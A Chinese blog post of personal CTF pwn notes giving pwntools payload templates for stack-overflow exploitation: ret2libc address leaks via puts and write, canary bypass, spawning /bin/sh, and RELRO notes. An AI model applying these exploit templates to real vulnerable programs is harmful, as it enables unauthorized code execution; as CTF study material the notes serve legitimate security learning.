PWN PWN PWN !!! 技巧 (1)

已于 2023-10-25 22:14:51 修改
阅读量1.4k 收藏 33
点赞数 8
分类专栏: PWN 文章标签: 安全 网络安全
于 2023-10-06 15:30:14 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Xzzzz911/article/details/133610804
版权

简介:

记录一下,基础的知识点和一些工具的用法,解题模板等(本人记性差时不时会忘记,记录一下与大家共勉)

32位传参

32位传参的方式是通过栈来传参的,与构造的payload也是有关的,大致如下:(有时候也会变根据题目意思来)

payload =填充的数据 +system +垃圾数据 +binsh

64位传参

64位传参前六个参数是通过寄存器来传参的,分别位rdi,rsi,rdx,rcx,r8,r9,之后的参数是通过栈传递的,同样构造payload也有一套,但还是需要具体问题具体分析,大致如下:

payload =填充的数据 + rdi +binsh +system

32位泄露libc之puts

这里只写构造payload的大体模板,其他的都是通式做多了就知道了(填充的数据是可以变的啊,main_addr也就是你需要返回的地址)

第一次payload泄露libc
payload =b'A'*(0x20 +4) +p32(elf.plt["puts"]) +p32(main_addr) +p32(elf.got['puts'])

第二次payload获得shell
payload =b'A'*(0x20 +4) +p32(ret_addr) +p32(sys_addr) +p32(0) +p32(bin_sh)

64位泄露libc之puts

第一次payload泄露libc
payload =b'A'*(0x20 +8) +p64(rdi_addr) +p64(elf.got['puts']) +p64(elf.plt["puts"]) +p64(main_addr)

第二次payload得shell
payload=b'A'*(0x20 +8) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) +p64(sys_addr)

32位泄露libc之write

第一次payload泄露libc
payload =b'A'*(0x20 +4) +p32(elf.plt['write']) +p32(main_addr) +p32(1)+ p32(elf.got['write']) +p32(4)

第二次payload获得shell
payload =b'A'*(0x20 +4) +p32(ret_addr) +p32(sys_addr) +p32(0) +p32(bin_sh)

64位泄露libc之write

第一次payload泄露libc
payload =b'A' * (0x20 +8) + p64(rdi_addr) +p64(1)+p64(pop_rsi_r15) +p64(elf.got['write']) +p64(0) +p64(elf.plt['write']) + p64(main_addr)

第二次payload得shell
payload =b' A' * (0x20 +8)  +p64(rdi_addr) + p64(bin_sh) +p64(sys_addr)

泄露libc之有libc文件

给fresh pwner提醒下,这里的puts是可以换的(看你是通过puts函数泄露的还是通过write函数泄露的,通过哪个写哪个)仔细观察有无 libc 文件的区别(发现没中小括号也是要区分的哦,可以自己试试)

libc_base = puts_addr - libc.sym['puts']
sys_addr = libc_base + libc.sym['system']
bin_sh = libc_base +  next(libc.search(b"/bin/sh\x00"))

泄露libc之无libc文件

libc = LibcSearcher('puts',puts_addr)
libc_base = puts_addr - libc.dump('puts')
sys_addr = libc_base + libc.dump('system')
bin_sh = libc_base + libc.dump('str_bin_sh')

Canary

第一次泄露libc

payload =b'A'*(0X20 -8) +p64(canary) +p64(0) +p64(rdi_addr) +p64(got_addr) +p64(plt_addr) +p64(vuln)

第二次获得shell

payload =b'A'*(0x20 -8) + p64(canary) +p64(0) +p64(ret_addr) +p64(rdi_addr) +p64(bin_sh) 

Relro

(1)RELRO防御策略是当RELRO保护:

  为NO RELRO的时候,init.array、fini.array、got.plt均可读可写
  为PARTIAL RELRO的时候,ini.array、fini.array可读不可写,got.plt可读可写
  为FULL RELRO时,init.array、fini.array、got.plt均可读不可写

(2)linux程序运行时:

  在加载的时候,会依次调用init.array数组中的每一个函数指针
  在结束的时候,依次调用fini.array中的每一个函数指针。

(3)当程序出现格式化字符串漏洞,但是至少需要写两次才能完成攻击。

  当少于两个输入点时,可以考虑改写fini.array中的函数指针为main函数地址,可以再执行一次main函数。
  一般来说,这个数组的长度为1,也就是说只能写一个地址。[1]

 总结:

多做pwn,多总结,加油,冲冲冲!!!

Xzzzz911
关注
专栏目录
CTF-PWN练习之函数指针改写
ChuMeng1999的博客
01-05 517
目录预备知识一、相关实验二、objdump使用三、函数指针实验目的实验环境实验步骤一源码审计实验步骤二使用gdb调试程序实验步骤三发起溢出攻击 预备知识 一、相关实验 本实验要求您已经认真学习和完成了《CTF-PWN练习》以及《CTF-PWN练习之精确覆盖变量数据》。 二、objdump使用 使用objdump工具可以查看一个目标文件的许多内部信息,objdump有许多可选的参数选项,通过控制这些参数选项可以输出不同的文件信息。 本实验中,在对二进制程序进行分析时,我们可以使用objdump获取二进制程序中
pwn入门——4.栈&栈帧
最新发布
weixin_62626298的博客
07-29 726
栈是一种典型的后进先出 (Last in First Out) 的数据结构,其操作主要有压栈 (push) 与出栈 (pop) 两种操作,如下图所示。两种操作都操作栈顶,当然,它也有栈底。
安恒杯pwn1
04-25
别人让做的一个Pwn,比较详细,记录一下
X86 32位汇编利用堆栈传递函数参数的过程
weixin_62320071的博客
03-12 1721
当传递的参数较少时,还是可以用寄存器来传参的,但是一旦传递的参数多了,就没办法了。主程序将入口参数压入堆栈,子程序从堆栈中取出参数;出口参数通常不使用堆栈传递。高级语言进行函数调用时提供的参数实质上也是用堆栈传递的,高级语言还利用堆栈创建局部变量。保存参数和局部变量的堆栈区域称为堆栈帧,在函数调用时建立、返回后消失。esp通常用来储存栈顶,ebp通常用来储存栈底。
关于pwn64位amd构造payload时的堆栈平衡问题以及32位与64位构造payload的区别与注意事项
hu_c_t_f的博客
07-24 2784
pwn入门,栈溢出漏洞是比较合适的。但我们经常会遇到i386【下面称32位】和arm64【下面称64位】的可执行程序【题目附件】。而32位与64位同样的情况,比如同样是ret2text或ret2syscall时,写的payload是不一样的,但大体的思路是一样的。本人也是入门pwn的小白,写的不对的地方还请师傅们指出。栈堆平衡32位中,没有堆栈平衡一说,而64位中有。payload中的堆栈平衡简单来说,就是要保证payload的字节数是16的倍数。
PWN入门(5)32位程序与64位程序和构造ROP链
Ba1_Ma0的博客
09-12 1788
pwn"这个词的源起以及它被广泛地普遍使用的原因,源自于魔兽争霸某段讯息上设计师打字时拼错而造成的,原先的字词应该是"own"这个字,因为 ‘p’ 与 ‘o’ 在标准英文键盘上的位置是相邻的,PWN 也是一个黑客语法的俚语词,是指攻破设备或者系统。发音类似"砰”,对黑客而言,这就是成功实施黑客攻击的声音,而在ctf比赛里,pwn是对二进制漏洞的利用。
对payload以及函数传参的进一步理解
RKAnjia的博客
03-23 2873
pwnpayload32位程序传参64位程序传参 payload 模板: payload=“a“*0x88 p.sendline(payload) 在模板里是先编造好payload,再在程序需要输入时用sendline()将payload向程序输入,程序接收payload对某些变量赋值。 例如: read(0,&buf,0x200ull); 在与靶机交互时,靶机执行到read函数时,会需要我们输入,这时我们输入payload,程序会对buf字符串赋值为88个a。 32位程序传参 64位程序传参
browser_pwn:浏览器pwn,现在主要工作
03-22
总结来说,浏览器Pwn是一项涉及广泛的技术,涵盖了JavaScript引擎的安全性分析、漏洞挖掘、利用技巧,以及对C++和相关工具的深入理解。对于网络安全专家和开发者而言,掌握这些知识能有效提升浏览器的安全性和抵御...
pwn_debug:旨在帮助快速构建对CTF Pwn游戏的利用
05-14
pwn_debug pwn_debug-基于pwntools的ctf pwns的辅助调试工具 建议您在获得“用法和安装”的完整说明。 这只是一个简单的描述。 入门 安装pwn_debug git clone ...## step 1 pdbg=pwn_debug("binary")
pwn学习资料整理——ROP技术(pwn_rop1)
08-30
pwn学习资料整理——ROP技术(pwn_rop1)
pwn ubuntu18的运行环境自己搭建
11-15
pwn ubuntu18的运行环境具体情参考https://blog.csdn.net/weixin_41748164/article/details/127874334
PWN基础之函数调用栈和栈溢出
weixin_46132162的博客
12-28 1478
在函数调用结束时,栈顶的函数(callee)状态被弹出,栈顶恢复到调用函数(caller)的状态函数调用栈在内存中从高地址向低地址生长,所以栈顶对应的内存地址在压栈时变小,退栈时变大。接下来vulnerable_function()函数会调用read()函数,这个时候vulnerable_function()函数为主调函数(caller function)read()函数为被调函数(callee function)read()函数 是有参数的,我们来看一看有参数的函数在函数调用栈是什么样的。
CTF PWN - ROP ->Payload实例(攻防世界level2)
yajuanpi4899的博客
11-04 1537
ROP(Return Oriented Programming)攻击原理:提取反汇编中以ret结尾的代码片段或函数组合实现拓展可写栈空间,组成/bin/sh等常用系统执行命令。 ret指令:将ESP(栈顶地址)中地址弹出至EIP寄存器,代码自动跳转到之前栈顶存放的返回地址,以此构成rop链。(X86)rop链即是基于以上这个简单的原理,在代码空间中寻找以ret结尾的代码片段或函数(代码片段称为Rop gadgets),组合可以实现拓展可写栈空间、写入内存、shell等功能,依靠ret将代码执行权紧握在自己
CTF PWN练习之函数指针改写
m0_59598029的博客
07-29 44
使用objdump工具可以查看一个目标文件的许多内部信息,objdump有许多可选的参数选项,通过控制这些参数选项可以输出不同的文件信息。本实验的程序和代码位于/home/test/4目录下,执行objdump -d pwn4可以看到关于pwn4程序的反汇编指令列表,其中-d选项表示进行反汇编操作.本文涉及相关实验:[《CTFPWN练习之函数指针改写》](https://www.hetianlab.com/expc.do?
C语言函数调用时的参数传递机制
whowin
01-26 1182
本文通过实例验证了 C 语言函数调用时参数传递机制在 32 位和 64 位时的不同;阅读本文不仅需要 C 语言的知识,还需要有一些汇编语言的知识。
pwn简单学习
m0_51974791的博客
07-14 329
最简单的栈溢出 以ret2text题目为例 篡改栈帧上的返回地址为程序中已经有的后门函数 首先用cheksec查一下文件的一些基本信息: 是一个32位的文件,NX enabled开启就是意味着栈中数据没有执行权限。 拿IDA看一下函数: vulnerable()显然是一个有问题的函数跟进去 这里使用了gets指令来读入数据,buffer[8]很明显,向gets读大于8的数据就会溢出。 还发现该程序留有后门在程序中: 思路很明确了,要返回到get_shell这个函数就能获得交互界面。现在只需要确定
Linux32和Linux64下进程栈分析
m0_37891226的博客
12-25 382
Linux32和Linux64下进程栈分析 x86 和 x86-64 系统采用不同的方式来对函数参数进行传递。x86通过栈进行参数的传递,而x86-64通过寄存器进行参数的传递。 用一段简单的代码来进行分析: using namespace std; int add(int a, int b){ return a + b; } int main(int argc, char const *ar...
Pwn】保护和溢出
weixin_52553215的博客
11-23 3947
检查保护:checksec 文件名 编译并关闭栈保护:gcc -no-pie -fno-stack-protector -z execstack -m32 -o read read.c 查看程序使用了哪些函数:objdump -t -j .test.read(推荐使用ida)
2018 10 11 pwn的学习0x2 gets函数和fgets函数 ,新的参数传递方式
startr4ck
10-11 1480
还是一一样的没有binsh字符串 所以我们需要继续读取字符串到内存当中  在id中寻找函数 发现并没有我们想要的提权函数 我们可以尝试着搜索gadgets去寻找我们想要找到的 看到有汇编代码   mov dword ptr[edi],ebp 和 pop edi ebp pop edi ebp 后面就跟参数edi 放地址,ebp放数值。 就可以将ebp的数值放在edi位置上   直接利...
二进制利用入门:Pwn挑战解析
一方面,人们可能被黑客的神秘感和技巧所吸引,希望能像电影中那样破解系统。另一方面,通过解决pwn挑战,你可以获得免费的食物和住所(比如在父母地下室里的生活),虽然这可能是一种幽默的表达,但它确实暗示了...
评论 5
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值